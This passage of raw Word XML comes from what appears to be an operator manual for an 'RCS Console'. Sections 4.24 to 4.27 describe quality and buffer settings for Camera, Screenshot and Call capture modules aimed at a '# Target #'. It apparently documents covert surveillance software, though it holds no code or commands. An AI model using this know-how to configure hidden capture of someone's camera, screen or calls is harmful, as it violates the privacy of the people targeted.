      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>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6B0A21" w:rsidTr="00F43991">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F43991" w:rsidRDefault="00F43991" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRDefault="0010013A" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.24</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B0A21" w:rsidRPr="00A52C9B" w:rsidRDefault="00F43991" w:rsidP="00F4399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(Camera)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1133" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.55pt;height:94.6pt;z-index:251755520;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId174" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1133" DrawAspect="Content" ObjectID="_1446455363" r:id="rId175"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006B0A21" w:rsidRDefault="006B0A21" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006B0A21" w:rsidRPr="00F43991" w:rsidRDefault="006B0A21" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B0A21" w:rsidRPr="00F43991" w:rsidRDefault="006B0A21" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="006B0A21" w:rsidRPr="00F43991" w:rsidRDefault="00FB5F57" w:rsidP="006B0A21">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Quality</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the image quality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B65160" w:rsidRDefault="00B65160" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0003387E" w:rsidRDefault="0003387E" w:rsidP="0079037A">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03387E" w:rsidTr="00F43991">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F43991" w:rsidRDefault="00F43991" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRDefault="0010013A" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.25</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0003387E" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>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(Screenshot)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1135" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.55pt;height:83.7pt;z-index:251757568;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId176" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1135" DrawAspect="Content" ObjectID="_1446455364" r:id="rId177"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0003387E" w:rsidRDefault="0003387E" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0003387E" w:rsidRPr="00F43991" w:rsidRDefault="0003387E" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="0003387E" w:rsidRPr="00F43991" w:rsidRDefault="0003387E" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FB5F57" w:rsidRPr="00F43991" w:rsidRDefault="00FB5F57" w:rsidP="00FB5F57">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Quality</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the image quality.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0003387E" w:rsidRPr="00F43991" w:rsidRDefault="0003387E" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00F43991" w:rsidRDefault="00424EB1" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Only foreground window</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00FB5F57" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Captures snapshot of the foreground window only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0003387E" w:rsidRDefault="0003387E" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00424EB1" w:rsidRDefault="00424EB1" w:rsidP="0079037A">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424EB1" w:rsidTr="00F43991">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F43991" w:rsidRDefault="00F43991" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRDefault="0010013A" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.26</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00A52C9B" w:rsidRDefault="00F43991" w:rsidP="00F4399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(Call)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1137" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.55pt;height:95.45pt;z-index:251759616;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId178" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1137" DrawAspect="Content" ObjectID="_1446455365" r:id="rId179"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00424EB1" w:rsidRDefault="00424EB1" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00F43991" w:rsidRDefault="00424EB1" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00F43991" w:rsidRDefault="00424EB1" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00F43991" w:rsidRDefault="00424EB1" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Buffer size</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00C74709" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the buffer size used for audio sectors.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00F43991" w:rsidRDefault="00424EB1" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Quality</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ]</w:t>
            </w:r>
            <w:r w:rsidR="00B654E0" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is the audio quality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00424EB1" w:rsidRDefault="00424EB1" w:rsidP="00424EB1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F43991" w:rsidRDefault="00F43991">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9628"/>
      </w:tblGrid>
      <w:tr w:rsidR="00087607" w:rsidTr="00C93347">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00087607" w:rsidRDefault="003A4380" w:rsidP="00087607">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1139" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:469.65pt;height:299.7pt;z-index:251761664;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId180" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1139" DrawAspect="Content" ObjectID="_1446455366" r:id="rId181"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00087607" w:rsidRDefault="0010013A" w:rsidP="0010013A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.27</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00087607">
              <w:rPr>
